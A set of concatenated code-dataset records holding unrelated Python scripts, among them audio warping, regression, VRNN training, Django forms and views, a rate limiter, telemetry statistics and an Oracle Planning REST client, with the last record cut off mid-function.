dtype=np.int16)\nscipy.io.wavfile.write('./music/mix.wav',easonrate,mix)\ndureason=eason[:,0].size/44100\nx=np.linspace(0,12,dureason*44100) \nplt.subplot(311)\nplt.plot(x,eason[:,0])\nplt.title('Left')\nplt.subplot(312)\nplt.plot(x,eason[:,1])\nplt.title('Right')\nplt.subplot(313)\nplt.plot(x,mix[:])\nplt.title('Mix')\n#plt.show()\n#mix channel\n\n# warping\nrate,data=scipy.io.wavfile.read('project.wav')\noutput = np.zeros(data.shape, dtype=data.dtype)\nrows, cols = data.shape\nfor i in range(rows):\n for j in range(cols):\n offset_x = int(20.0 * math.sin(2 * 3.14 * i / 150))\n offset_y = int(20.0 * math.cos(2 * 3.14 * j / 150))\n if i+offset_y < rows and j+offset_x < cols:\n output[i,j] = data[(i+offset_y)%rows,(j+offset_x)%cols]\n else:\n output[i,j] = 0\nscipy.io.wavfile.write('./music/warping.wav',rate,output)\n# warping","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"594262693","text":"data=[34,56,67,78,89,-67,100]\r\n\r\n# def fct(a):\r\n# return a**3\r\n\r\nresult=list(map(lambda a: a**3, data))\r\n\r\nprint(result)\r\n\r\ntext=\"34;45;67;78;89\"\r\nresult=text.split(\";\")\r\nprint(result)\r\nresult=list(map(int, result))\r\nprint(result)\r\n\r\ndata=[34,56,-67,-78,89,-67,100]\r\n\r\n# def isPos(a):\r\n# return a > 0\r\n\r\nresult=list(filter(lambda a: a>0, data))\r\nprint(result)\r\n\r\n# def isEven(a):\r\n# return a % 2 == 0\r\n\r\nresult=list(filter(lambda a: a%2 == 0, data))\r\nprint(result)\r\n\r\nimport functools\r\n\r\ndata=[34,56,-67,-78,89,-67,100]\r\n\r\n# def add(a, b):\r\n# return a+b\r\n\r\nresult=functools.reduce(lambda a,b: a+b, data)\r\nprint(result)","sub_path":"lambda2.py","file_name":"lambda2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"147697955","text":"import numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nraw_data = pd.read_csv('1.03.+Dummies.csv')\ndata = raw_data.copy()\ndata['Attendance'] = data['Attendance'].map({'Yes':1, 'No':0})\n\n# ? Here the regression begins:\ny = data['GPA'] # ! Selecting GPA as the dependent variable\nx1 = data[['SAT','Attendance']] # ! Selecting SAT and Attendance as independent variables\n\nx = sm.add_constant(x1)\nresult = sm.OLS(y,x).fit()\nresult.summary()\n\n# ? 
Plotting the regression\nplt.scatter(data['SAT'], y)\nyhat_no = 0.6439 + 0.0014*data['SAT']\nyhat_yes = 0.8665 + 0.0014*data['SAT']\nfig = plt.plot(data['SAT'], yhat_no, lw=2, c=\"#006837\")\nfig = plt.plot(data['SAT'], yhat_yes, lw=2, c=\"#a50026\")\nplt.xlabel('SAT', fontsize =20)\nplt.ylabel('GPA', fontsize = 20)\nplt.show()\n\n# ! The SAT of the student which attended to more than 75% of the classes were 0.2226 higher than\n#! the gpa of students which not attended.\n\n# ? Creating a data frame base on two students SAT scores;\nnew_data = pd.DataFrame({'const':1, 'SAT':[1700,1670], 'Attendance':[0,1]})\nnew_data = new_data[['const', 'SAT', 'Attendance']]\n\n#! Creating predictions about the students;\npredictions = result.predict(new_data)\n\n#! Creating another data frame;\npredictionsdf = pd.DataFrame({'Predictions':predictions})\njoined = new_data.join(predictionsdf)\njoined.rename(index={0:'Bob', 1:'Alice'})\n","sub_path":"dummy_variable/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"310425889","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.utils\nimport torch.utils.data\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt \nfrom model import VRNN\n\n\nimport torch.distributions.normal as Norm\nimport torch.distributions.kl as KL\nimport torch.nn.functional as F\n\n\"\"\"implementation of the Variational Recurrent\nNeural Network (VRNN) from https://arxiv.org/abs/1506.02216\nusing unimodal isotropic gaussian distributions for \ninference, prior, and generating models.\"\"\"\n\n\ndef loss_funct(out, x):\n\tprior_mu, prior_sig, decoder_mu, decoder_sig, x_decoded = out\n\tloss = 0.\n\tfor i in range(x.shape[1]):\n\n\t\t#KL div\n\t\ta = Norm.Normal(prior_mu[i], prior_sig[i])\n\t\tb = Norm.Normal(decoder_mu[i], decoder_sig[i])\n\t\tkl_div = torch.mean(KL.kl_divergence(a, b))\n\n\t\tcrossent = torch.mean(F.binary_cross_entropy(x_decoded[i], x[:,i,:], reduction = 'none'))\n\t\tloss += crossent + kl_div\n\n\treturn loss\n\n\n\ndef train(loader, model, optimizer, epochs=100):\n\tdevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\tmodel.to(device)\n\tfor epoch in range(epochs):\n\t\ttrain_loss = 0\n\t\tfor batch_idx, (data, target) in enumerate(loader):\n\n\t\t\tdata = data.squeeze(1)\n\t\t\tdata = (data/255).to(device)\n\t\t\touts = model(data)\n\t\t\tloss = loss_funct(outs, data)\n\t\t\tmodel.zero_grad()\n\t\t\tloss.backward()\n\t\t\t_ = torch.nn.utils.clip_grad_norm_(model.parameters(), 5)\n\t\t\toptimizer.step()\n\t\t\tprint(loss)\n\n\n#hyperparameters\nx_dim = 28\nh_dim = 100\nz_dim = 16\nn_epochs = 100\nclip = 10\nlearning_rate = 1e-3\nbatch_size = 512\nseed = 128\nprint_every = 100\nsave_every = 10\n\n#manual seed\ntorch.manual_seed(seed)\nplt.ion()\n\n#init model + optimizer + datasets\ntrain_loader = torch.utils.data.DataLoader(datasets.MNIST('data',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t train=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t download=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t transform=transforms.ToTensor()),\n\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(datasets.MNIST('data',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t train=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t transform=transforms.ToTensor()),\n\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\nmodel = VRNN(x_dim, h_dim, z_dim)\noptimizer = 
torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\n#training + testing\ntrain(train_loader, model, optimizer)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"456946632","text":"f_names = open(\"usns_and_names_dictionary.txt\")\nx = f_names.read()\nx = eval(x)\nresults_list = []\nf_results = open(\"esa_results_cs_1st_year_physics_cycle.csv\")\nfor asj in f_results:\n\tbreak\nfor line in f_results:\n\ttry:\n\t\tl = line.split(\",\")\n\t\tlength = len(l)\n\t\tusn = l[0]\n\t\tresults_list.append(list((l[-1].strip(),x[usn])))\n\texcept Exception as e:\n\t\tasdfghjk = 123456789\n\nresults_list1 = results_list[:]\nresults_list1.sort(reverse = True)\nc = 1\ntotal = len(results_list1)\n\nfor i in results_list1:\n\tif \"NOT FOUND\" in i:\n\t\ttotal -= 1\n\n\n\nprint(\"RANK (/\"+str(total)+\"), NAME , SGPA\")\nfor i in results_list1:\n\tif \"NOT FOUND\" not in i:\n\t\tprint(c,\", \",i[1],\", \",i[0])\n\t\tc += 1\n\nf_results.close()\nf_names.close()\n","sub_path":"esa_results/cs_branch_ranks.py","file_name":"cs_branch_ranks.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"226647872","text":"import datetime\nfrom django import forms\nfrom deliverycenters.cache import get_center_cache\nfrom dvutils.widgets import Html5DateInput\nfrom lm_store.app_settings import DOWNLOAD_PERMISSION_MAP\nfrom lm_store.app_settings import UPLOAD_PERMISSION_MAP\n\n\nclass LmStoreBaseForm(forms.Form):\n \"\"\"Storage format is 'Bucket_name/type/identifier/date/file.ext'\n Type - upload category(rto, dto, pod)\n center - can be stored as cn, zn, region, user\n date = upload date\n \"\"\"\n def __init__(self, user, *args, **kwargs):\n super(LmStoreBaseForm, self).__init__(*args, **kwargs)\n self.fields['date'].initial =\\\n datetime.date.today().strftime('%Y-%m-%d')\n\n category = forms.ChoiceField(required=True, initial='')\n date = forms.DateTimeField(label='Dated',\n widget=Html5DateInput())\n identifier = forms.ChoiceField(required=True, initial='')\n tracking_number = forms.CharField(label=\"Track#\", required=False)\n\n\ndef get_lmstore_upload_type(user):\n type_list = []\n for k, v in UPLOAD_PERMISSION_MAP.items():\n if user.has_perm(\"backend.%s\" % (v[0])):\n type_list.append((k, k))\n return type_list\n\n\nclass LmStoreUploadForm(LmStoreBaseForm):\n def __init__(self, user, *args, **kwargs):\n \"\"\"renaming category to type and\n identifier as center, making date mandatory,\n providing choices in type, center \"\"\"\n super(LmStoreUploadForm, self).__init__(user, *args, **kwargs)\n CENTER_OPTIONS = get_center_cache('code_name')\n self.fields['date'].required = True\n self.fields['identifier'].label = 'Center'\n self.fields['category'].label = 'Type'\n self.fields['identifier'].choices = [\n ('', 'Select center')] + CENTER_OPTIONS\n self.fields['category'].choices = [('', 'Select type')] + \\\n get_lmstore_upload_type(user)\n self.fields[\"tracking_number\"].required = True\n\n file = forms.FileField(required=True)\n\n\ndef get_lmstore_download_type(user):\n type_list = []\n for k, v in DOWNLOAD_PERMISSION_MAP.items():\n if user.has_perm(\"backend.%s\" % (v[0])):\n type_list.append((k, k))\n return type_list\n\n\nclass LmStoreListForm(LmStoreBaseForm):\n def __init__(self, user, *args, **kwargs):\n \"\"\"renaming category to type and\n identifier as center, making 
date mandatory,\n providing choices in type, center \"\"\"\n super(LmStoreListForm, self).__init__(user, *args, **kwargs)\n CENTER_OPTIONS = get_center_cache('code_name')\n self.fields['identifier'].label = 'Center'\n self.fields['category'].label = 'Type'\n self.fields['identifier'].choices = [\n ('', 'Select center')] + CENTER_OPTIONS\n self.fields['category'].choices = [('', 'Select type')] + \\\n get_lmstore_download_type(user)\n","sub_path":"lm_store/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"527524576","text":"import asyncio\nimport time\n\n\nclass BungieRateLimiter:\n \"\"\"\n Gives out x tokens for network operations every y seconds\n Adapted from https://gist.github.com/pquentin/5d8f5408cdad73e589d85ba509091741\n \"\"\"\n\n RATE = 20 # how many requests per second - bungie allows 20/s\n MAX_TOKENS = 240 # how many requests can we save up - bungie limits after 250 in 10s, so will put that to 240\n\n def __init__(self):\n self.tokens = self.MAX_TOKENS\n self.updated_at = time.monotonic()\n\n async def wait_for_token(self):\n \"\"\"waits until a token becomes available\"\"\"\n while self.tokens < 1:\n self.add_new_tokens()\n await asyncio.sleep(0.1)\n assert self.tokens >= 1\n self.tokens -= 1\n\n def add_new_tokens(self):\n \"\"\"Adds a new token if eligible\"\"\"\n now = time.monotonic()\n time_since_update = now - self.updated_at\n new_tokens = time_since_update * self.RATE\n if self.tokens + new_tokens >= 1:\n self.tokens = min(self.tokens + new_tokens, self.MAX_TOKENS)\n self.updated_at = now\n","sub_path":"ElevatorBot/networking/bungieRatelimiting.py","file_name":"bungieRatelimiting.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"629132000","text":"import inspect\n\n\nclass NotApplicableError(Exception):\n \"\"\"Raised when a method of a class instance is called but when such class should not call the method\"\"\"\n\n def __init__(self, *args):\n if len(args) == 0:\n stack = inspect.stack()[1]\n _class = stack.frame.f_locals['self'].__class__.__name__\n _method = stack.function\n args = [f\"'{_method}' is not defined for {_class}\"]\n\n super(NotApplicableError, self).__init__(*args)\n","sub_path":"copulae/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"425354780","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.db.models.functions import TruncMonth\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Sum\nfrom .forms import *\nfrom .models import *\nfrom .filters import *\nfrom .utils import *\nimport datetime\n\n\n@login_required\ndef parentdashboard(request):\n parent = Parents.objects.get(id=request.user.username)\n child = Students.objects.filter(parent_id=parent.id)\n ord = StudentBill.objects.filter(parent_id=parent.id).order_by('-id')\n children = child.count()\n fees = ord.aggregate(cc=Sum('amount'))\n fees_paid = ord.aggregate(ff=Sum('amount_paid'))\n \n if fees['cc'] and not fees_paid['ff']:\n current_bill = fees['cc']\n elif not fees['cc'] and fees_paid['ff']:\n current_bill= fees_paid['ff']\n elif not fees['cc'] and not fees_paid['ff']:\n current_bill = 
0.00\n else:\n current_bill = fees['cc']-fees_paid['ff']\n\n context={\n 'parent':parent,\n 'ord': ord,\n 'children': children,\n 'fees':fees,\n 'fees_paid': fees_paid,\n 'current_bill': current_bill,\n 'child': child,\n }\n \n template ='hod_template/parentdashboard.html'\n return render(request,template,context)\n\n\n@login_required\ndef parentbill(request,pk):\n # studbill = StudentBill.objects.get(id=pk)\n stud = Students.objects.get(id=pk)\n # bb = Bills.objects.get(id=stud.course)\n bill = Bills.objects.filter(\n class_id=stud.course_id)\n \n context = {\n 'bill': bill,\n # 'arres': arres,\n # 'studbill': studbill,\n }\n \n template='hod_template/manage_bill.html'\n return render(request,template)\n\n\n@login_required\ndef child_results(request):\n attendance_list = studenthistory.objects.filter(\n parent_id=request.user.username).order_by('-results')\n context = {\n 'academic_term': attendance_list,\n }\n\n template = 'staff_template/manage_resultss.html'\n return render(request, template, context)\n","sub_path":"school/parent.py","file_name":"parent.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"175724469","text":"#!/usr/bin/env /data/mta/Script/Python3.6/envs/ska3/bin/python\n\n#######################################################################################\n# #\n# gratgen_categorize_data.py: separate gratgen data into different categories #\n# #\n# author: t. isobe (tisobe@cfa.harvard.edu) #\n# #\n# last update: May 20, 2019 #\n# #\n#######################################################################################\n\nimport sys\nimport os\nimport string\nimport re\nimport getpass\nimport fnmatch\nimport numpy\nimport getopt\nimport os.path\nimport time\nimport astropy.io.fits as pyfits\nimport Ska.engarchive.fetch as fetch\nimport Chandra.Time\nimport random\npath = '/data/mta/Script/MTA_limit_trends/Scripts/house_keeping/dir_list'\n\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n\nsys.path.append(mta_dir)\nsys.path.append(bin_dir)\n\nimport mta_common_functions as mcf #---- mta common functions\nimport envelope_common_function as ecf #---- collection of functions used in envelope fitting\nimport update_database_suppl as uds\n#\n#--- set a temporary file name\n#\nrtail = int(time.time() * random.random())\nzspace = '/tmp/zspace' + str(rtail)\n#\n#--- other settings\n#\nna = 'na'\ncname_list = ['retr_hetg', 'retr_letg', 'insr_hetg', 'insr_letg', 'grat_active', 'grat_inactive']\nmsid_list = ['4hposaro', '4hposbro', '4lposaro', '4lposbro',\\\n '4mp28av', '4mp28bv', '4mp5av', '4mp5bv']\n\n#----------------------------------------------------------------------------------------\n#-- gratgen_categorize_data: separate gratgen data into different categories --\n#----------------------------------------------------------------------------------------\n\ndef gratgen_categorize_data():\n \"\"\"\n separate gratgen data into different categories\n input: none but use /Gratgen/*.fits\n output: /Gratgen_/*.fits\n \"\"\"\n#\n#--- get the basic information\n#\n [udict, ddict, mta_db, mta_cross] = ecf.get_basic_info_dict()\n\n for msid in msid_list:\n cols = ['time', msid, 'med', 'std', 'min', 'max', 'ylower',\\\n 'yupper', 'rlower', 'rupper', 'dcount', 'ylimlower',\\\n 'ylimupper', 'rlimlower', 'rlimupper']\n\n glim = 
ecf.get_limit(msid, 0, mta_db, mta_cross)\n\n for category in cname_list:\n print(\"Running: \" + str(msid) + '<-->' + category )\n\n cfile1 = data_dir + 'Gratgen/' + category.capitalize() + '/' + msid + '_data.fits'\n cfile2 = data_dir + 'Gratgen/' + category.capitalize() + '/' + msid + '_short_data.fits'\n cfile3 = data_dir + 'Gratgen/' + category.capitalize() + '/' + msid + '_week_data.fits'\n\n stday = time.strftime(\"%Y:%j:00:00:00\", time.gmtime())\n tcut1 = 0.0\n tcut2 = Chandra.Time.DateTime(stday).secs - 31622400.0 #--- a year agao\n tcut3 = Chandra.Time.DateTime(stday).secs - 864000.0 #--- 10 days ago\n\n if os.path.isfile(cfile1):\n tchk = ecf.find_the_last_entry_time(cfile1)\n else:\n tchk = 0\n\n ifile = house_keeping + category\n data = mcf.read_data_file(ifile)\n start = []\n stop = []\n for ent in data:\n atemp = re.split('\\s+', ent)\n val1 = float(atemp[0])\n val2 = float(atemp[1])\n if val1 > tchk:\n start.append(val1)\n stop.append(val2)\n\n if len(start) == 0:\n continue\n\n for k in range(0, len(start)):\n diff = stop[k] - start[k]\n if diff < 300:\n start[k] -= 100\n stop[k] = start[k] + 300. \n\n data = fetch.MSID(msid, start[k], stop[k])\n\n if k == 0:\n ttime = list(data.times)\n tdata = list(data.vals)\n else:\n ttime = ttime + list(data.times)\n tdata = tdata + list(data.vals)\n\n if len(ttime) == 0:\n continue\n\n stat_out1 = get_stat(ttime, tdata, glim, 86400.0)\n stat_out2 = get_stat(ttime, tdata, glim, 3600.0)\n stat_out3 = get_stat(ttime, tdata, glim, 300.0)\n\n if tchk > 0:\n ecf.update_fits_file(cfile1, cols, stat_out1, tcut = tcut1)\n ecf.update_fits_file(cfile2, cols, stat_out2, tcut = tcut2)\n ecf.update_fits_file(cfile3, cols, stat_out3, tcut = tcut3)\n else:\n ecf.create_fits_file(cfile1, cols, stat_out1, tcut = tcut1)\n ecf.create_fits_file(cfile2, cols, stat_out2, tcut = tcut2)\n ecf.create_fits_file(cfile3, cols, stat_out3, tcut = tcut3)\n\n#-------------------------------------------------------------------------------------------\n#-- get_stat: compute stat for the given data --\n#-------------------------------------------------------------------------------------------\n\ndef get_stat(ttime, tdata, glim, step):\n \"\"\"\n compute stat for the given data \n input: ttime --- a list of time data\n tdata --- a list of data\n glim --- a lower and upper limit values\n output: wtime --- a list of time in sec from 1998.1.1\n wdata --- a list of the mean of each interval\n wmed --- a list of the median of each interval\n wstd --- a list of the std of each interval\n wmin --- a list of the min of each interval\n wmax --- a list of the max of each interval\n wyl --- a list of the rate of yellow lower violation\n wyu --- a list of the rate of yellow upper violation\n wrl --- a list of the rate of red lower violation\n wru --- a list of the rate of red upper violation\n wcnt --- a list of the total data counts\n wyl --- a list of the lower yellow limits\n wyu --- a list of the upper yellow limits\n wrl --- a list of the lower red limits\n wru --- a list of the upper red limits\n \"\"\"\n\n wtime = []\n wdata = []\n wmed = []\n wstd = []\n wmin = []\n wmax = []\n wyl = []\n wyu = []\n wrl = []\n wru = []\n wcnt = []\n wsave = []\n\n dtime = numpy.array(ttime)\n ddata = numpy.array(tdata)\n\n spos = 0\n chk = 1\n send = dtime[spos]\n\n for k in range(0, len(dtime)):\n if dtime[k] < send:\n chk = 0\n else:\n sdata = ddata[spos:k]\n if len(sdata) < 1:\n continue\n\n avg = sdata.mean()\n med = numpy.median(sdata)\n sig = sdata.std()\n try:\n amin = 
sdata.min()\n amax = sdata.max()\n except:\n amin = 0\n amax = 0\n ftime = dtime[spos + int(0.5 * (k-spos))]\n vlimits = uds.find_violation_range(glim, ftime)\n [yl, yu, rl, ru, tot] = uds.find_violation_rate(sdata, vlimits)\n wtime.append(ftime)\n wdata.append(avg)\n wmed.append(med)\n wstd.append(sig)\n wmin.append(amin)\n wmax.append(amax)\n wyl.append(yl)\n wyu.append(yu)\n wrl.append(rl)\n wru.append(ru)\n wcnt.append(tot)\n wsave.append(vlimits)\n \n spos = k\n send = dtime[k] + step\n chk = 1\n#\n#--- check whether there are any left over; if so add it to the data lists\n#\n if chk == 0:\n\n sdata = ddata[spos:k]\n avg = sdata.mean()\n med = numpy.median(sdata)\n sig = sdata.std()\n amin = sdata.min()\n amax = sdata.max()\n ftime = dtime[spos + int(0.5 * (k-spos))]\n vlimits = uds.find_violation_range(glim, ftime)\n [yl, yu, rl, ru, tot] = uds.find_violation_rate(sdata, vlimits)\n wtime.append(ftime)\n wdata.append(avg)\n wmed.append(med)\n wstd.append(sig)\n wmin.append(amin)\n wmax.append(amax)\n wyl.append(yl)\n wyu.append(yu)\n wrl.append(rl)\n wru.append(ru)\n wcnt.append(tot)\n wsave.append(vlimits)\n\n vtemp = [[], [], [], []]\n for k in range(0, len(wsave)):\n for m in range(0, 4):\n vtemp[m].append(wsave[k][m])\n\n wdata = [wtime, wdata, wmed, wstd, wmin, wmax, wyl, wyu, wrl, wru, wcnt] + vtemp\n\n return wdata\n\n#--------------------------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) > 1:\n ltype = sys.argv[1]\n else: \n ltype = ''\n\n gratgen_categorize_data()\n","sub_path":"MTA_limit_trends/Gratgen/gratgen_categorize_data.py","file_name":"gratgen_categorize_data.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"414532785","text":"\"\"\"\nThis module defines the functions that interact with the Planning REST API.\n\nUse these functions together to 'compose' a specific action, like\nimporting metadata, cube refresh, etc.\n\nMost of these functions raise Exception on error. 
The calling scripts can\nre-raise the Exceptions after logging or ignore them to let the\nprogram abort.\n\"\"\"\n\n# standard library\nimport time\nimport json\nimport queue\nfrom typing import List\n\n# 3rd party library\nimport requests\n\n# Functions defined:\n\n# isSuccessful\n# isProcessing\n# isError\n# getApiVersion\n# getJobs\n# postJob\n# executeJob\n# pingUntilCompleted\n\n\ndef isSuccessful(status: int) -> bool:\n    \"\"\"\n    Returns whether status code == 0\n\n    Args:\n        status (int): Status from parsed API response\n\n    Returns:\n        bool: True if successful else False\n    \"\"\"\n    return int(status) == 0\n\n\ndef isError(status: int) -> bool:\n    \"\"\"\n    Returns whether status code > 0\n\n    Args:\n        status (int): Status from parsed API response\n\n    Returns:\n        bool: True if error else False\n    \"\"\"\n    return int(status) > 0\n\n\ndef isProcessing(status: int) -> bool:\n    \"\"\"\n    Returns whether status code < 0\n\n    Args:\n        status (int): Status from parsed API response\n\n    Returns:\n        bool: True if processing else False\n    \"\"\"\n    return int(status) < 0\n\n\ndef getApiVersion(client) -> str:\n    \"\"\"\n    GET latest version of the Planning API and return it to the caller.\n\n    Args:\n        client (Client): Client object for request info and logger\n\n    Returns:\n        str: Planning API latest version\n\n    Raises:\n        Exception\n    \"\"\"\n    try:\n        client.logger.debug(\"Fetching planning API version\")\n\n        url = client.cloudUrl + \"HyperionPlanning/rest/\"\n        response = requests.get(url, auth=client.auth)\n        response.raise_for_status()  # raise exception if status > 400\n        data = response.json()\n\n        items = data[\"items\"]\n        for item in items:\n            if item[\"isLatest\"]:\n                version = item[\"version\"]\n                message = \"Fetched latest planning API version: \" + version\n                client.logger.debug(message)\n                return version\n    except Exception:\n        # print error details and re-raise\n        message = \"Exception while trying to get planning API version\"\n        client.logger.exception(message)\n        raise\n\n\ndef getJobs(client, version, jobType=None) -> List[dict]:\n    \"\"\"\n    GET list of jobs.\n    If jobType is provided, the filter will be applied to the request.\n    Returns jobList as list of dicts. Raises exception on errors.\n\n    Args:\n        client (Client): Client object for request info and logger\n        version (str): Planning API version\n        jobType (str, optional): Job type filter to apply to request\n\n    Returns:\n        list of dict: List of jobs from jobdefinitions. 
The items of the\n list are python dicts which have jobType, jobName key/values etc.\n\n Raises:\n Exception\n \"\"\"\n try:\n message = \"Fetching job list\"\n if jobType:\n message += \" - \" + jobType # append jobType if provided\n client.logger.debug(message)\n\n url = (\n client.cloudUrl\n + \"HyperionPlanning/rest/\"\n + version\n + \"/applications/\"\n + client.appName\n + \"/jobdefinitions\"\n )\n if jobType is not None: # add query param for specifying jobType\n url += \"?q={\\\"jobType\\\":\\\"%s\\\"}\" % jobType\n response = requests.get(url, auth=client.auth)\n response.raise_for_status() # raise exception if status > 400\n data = response.json()\n\n items = data[\"items\"]\n jobList = items\n # Logging\n message = \"Fetched job list successfully\"\n client.logger.debug(message)\n return jobList\n except Exception:\n client.logger.exception(\"Exception raised while trying to get jobs\")\n raise\n\n\ndef buildQueueFromList(jobOrder, jobList) -> queue.Queue:\n \"\"\"\n Creates and returns a FIFO queue object from the jobOrder and jobList.\n Appends refresh cube job at the end of the queue.\n Raises exception if a job in the jobOrder is not found in the jobList.\n\n Args:\n jobOrder (tuple): Tuple of jobsNames in order\n jobList (list): List of job dicts\n\n Returns:\n jobQueue (queue.Queue): A FIFO queue of job dicts\n\n Raises:\n Exception: If jobName from jobOrder has no match in jobList\n \"\"\"\n jobQueue = queue.Queue()\n for jobName in jobOrder: # traverses the tuple in order\n\n # fetch current job from jobList where jobName matches\n job = next(filter(lambda j: j[\"jobName\"] == jobName, jobList))\n\n if job is None:\n raise Exception(jobName + \" not found in jobList\")\n\n # add file name as job parameter\n job[\"parameters\"] = {\n \"importZipFile\": jobName + \".csv\"\n }\n\n jobQueue.put(job)\n\n # finally put the refresh cube job into the queue as the last job\n refreshCubeJob = {\"jobType\": \"CUBE_REFRESH\", \"jobName\": \"cuberefresh\"}\n jobQueue.put(refreshCubeJob)\n return jobQueue\n\n\ndef postJob(client, version, job: dict) -> str:\n \"\"\"\n POST the job dict passed as argument.\n The job passed in must be a dictionary containing \"jobType\",\n \"jobName\" key/values.\n If the job has a property \"parameters\" then it will be added to\n the request body.\n Returns jobId if job post successful. 
Raises exception on error.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n job (dict): Dict containing jobType, jobName and possibly properties\n\n Returns:\n str: jobId if job post successful\n\n Raises:\n Exception\n \"\"\"\n try:\n client.logger.debug(\"Sending POST request\")\n\n body = {\"jobType\": job[\"jobType\"], \"jobName\": job[\"jobName\"]}\n if \"parameters\" in job:\n body[\"parameters\"] = job[\"parameters\"]\n\n url = (\n client.cloudUrl\n + \"HyperionPlanning/rest/\"\n + version\n + \"/applications/\"\n + client.appName\n + \"/jobs\"\n )\n headers = {\"content-type\": \"application/json\"}\n response = requests.post(\n url, data=json.dumps(body), headers=headers, auth=client.auth)\n response.raise_for_status() # raise exception if status > 400\n data = response.json()\n\n status = data[\"status\"]\n\n if isProcessing(status):\n message = \"Job sent to server and is being processed...\"\n client.logger.debug(message)\n\n elif isError(status):\n message = \"Error status received - API response below\"\n client.logger.error(message, data)\n raise Exception(data[\"details\"])\n\n elif isSuccessful(status):\n client.logger.debug(\"Job {} successful\".format(job[\"jobName\"]))\n\n if \"jobId\" in data:\n return str(data[\"jobId\"])\n else:\n raise Exception(\"No jobId in response\")\n except Exception:\n client.logger.exception(\"Exception raised while trying to POST job\")\n raise\n\n\ndef executeJobsFromQueue(client, version, jobQueue: queue.Queue) -> None:\n \"\"\"\n Executes each job pulled from the job queue passed as a parameter.\n If a job execution fails for any reason, the details will be logged\n and loop will continue with the next job in the queue.\n Raises exception if any unexpected errors occur.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n jobQueue (queue.Queue): Python FIFO queue with job dicts arranged\n in the execution order specific to an application.\n\n Raises:\n Exception\n \"\"\"\n try:\n # execute jobs in sequence from the queue\n while not jobQueue.empty():\n job = jobQueue.get()\n\n # set process attribute for logger\n client.logger.process = job[\"jobName\"]\n\n try:\n executeJob(client, version, job)\n except Exception:\n # Do nothing but log if current job fails\n client.logger.debug(\"failed - Moving on to next job in queue\")\n\n except Exception as err:\n client.logger.error(\n \"While trying to get and execute jobs from queue\", err)\n raise\n\n\ndef executeJob(client, version, job: dict):\n \"\"\"\n Wraps the function calls to post a job and to ping until completion so\n a client doesn't have to call both functions. Call this function\n and pass it the job.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n job (dict): Dict containing job info\n \"\"\"\n jobId = postJob(client, version, job)\n pingUntilCompleted(client, version, jobId)\n\n\ndef pingUntilCompleted(client, version, jobId) -> bool:\n \"\"\"\n Check job status for passed in jobId and api version until\n complete or error. 
Raises exception on error.\n\n    Note: Only used for checking job status of Hyperion Planning jobs.\n\n    Args:\n        client (Client): Client object for request info and logger\n        version (str): Planning API version\n        jobId (str): Id of job to ping\n\n    Returns:\n        bool: True on successful finish\n\n    Raises:\n        Exception\n    \"\"\"\n    try:\n        client.logger.debug(\"Sending first ping for job status\")\n\n        url = (\n            client.cloudUrl\n            + \"HyperionPlanning/rest/\"\n            + version\n            + \"/applications/\"\n            + client.appName\n            + \"/jobs/\"\n            + jobId\n        )\n        done = False\n        while not done:\n            response = requests.get(url, auth=client.auth)\n            response.raise_for_status()  # raise exception if status > 400\n            data = response.json()\n            status = data[\"status\"]\n\n            if isSuccessful(status):\n                message = data[\"details\"]\n                client.logger.debug(message)\n                done = True  # breaks out of loop\n\n            elif isError(status):\n                message = \"Error status while pinging - API response below\"\n                client.logger.error(message, data)\n\n                if \"child jobs have failed\" in data[\"details\"]:\n                    _logChildJobErrorList(client, data[\"links\"])\n\n                raise Exception(data[\"details\"])\n\n            else:\n                # processing\n                message = 